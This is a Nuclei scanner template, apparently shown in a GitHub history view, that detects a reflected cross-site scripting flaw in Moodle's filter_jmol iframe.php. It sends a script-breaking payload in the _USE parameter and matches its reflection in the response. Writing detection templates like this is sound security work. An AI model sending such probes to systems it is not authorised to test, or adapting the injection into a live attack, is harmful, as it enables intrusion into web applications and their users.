nuclei-templates/vulnerabilities/moodle-filter-jmol-xss.yaml

20 lines
368 B
YAML
Raw Normal View History

id: moodle-filter-jmol-xss
2020-04-08 12:48:06 +00:00
info:
name: Moodle filter_jmol XSS
author: madrobot
severity: medium
requests:
- method: GET
path:
- "{{BaseURL}}/filter/jmol/iframe.php?_USE=%22};alert(1337);//"
matchers:
- type: status
status:
- 200
2020-04-08 13:27:52 +00:00
- type: word
words:
2020-05-08 04:50:17 +00:00
- "\"};alert(1337);//"
2020-04-08 12:48:06 +00:00
part: body